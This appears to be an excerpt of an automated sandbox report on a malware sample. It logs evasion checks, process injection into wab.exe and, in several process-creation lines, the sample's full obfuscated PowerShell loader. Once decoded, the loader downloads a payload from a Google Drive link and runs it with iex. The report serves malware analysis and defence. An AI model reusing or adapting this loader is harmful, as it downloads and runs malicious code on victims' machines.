            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596468Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595550Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595306Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594849Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594496Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6547Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3260Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6017Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3840Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5220Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4609Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 7532Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep count: 6017 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep count: 3840 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -22136092888451448s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3656Thread sleep count: 5220 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599654s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3656Thread sleep count: 4609 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599436s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599324s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599217s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -598873s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -598765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -598644s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -598515s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -598218s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597997s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597670s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597557s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -597015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596906s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596796s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596468s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -596015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595906s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595797s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595550s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595422s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595306s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -594849s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -594496s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -594390s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692Thread sleep time: -594281s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599654Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599436Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599324Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599217Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598873Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598644Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597997Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597670Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597557Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596468Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595550Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595306Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594849Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594496Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594281Jump to behavior
            Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPu9
            Source: powershell.exe, 00000003.00000002.2461093933.0000018939B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
            Source: wscript.exe, 00000001.00000002.1463808181.00000171D0433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000001.00000002.1463735069.00000171D0391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000001.00000003.1462529160.00000171D0433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
            Source: wscript.exe, 00000001.00000002.1463388260.00000171D0280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B72FBC LdrInitializeThunk,LdrInitializeThunk,9_2_07B72FBC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EFFCFCJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars 